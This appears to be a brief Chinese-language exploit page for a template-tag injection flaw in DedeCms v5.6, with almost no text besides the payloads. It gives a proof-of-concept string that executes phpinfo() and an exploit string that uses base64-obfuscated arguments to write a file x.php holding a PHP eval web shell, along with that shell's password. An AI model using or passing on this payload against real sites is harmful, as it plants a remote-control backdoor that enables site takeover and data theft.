# DedeCms v5.6 嵌入惡意代碼執行漏洞/zh-tw
==漏洞信息==
在上傳軟件的位置,對本地地址沒有進行有效的驗證,可以被惡意利用。
==POC==
a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},
==EXP==
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
x.php password:xiao
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容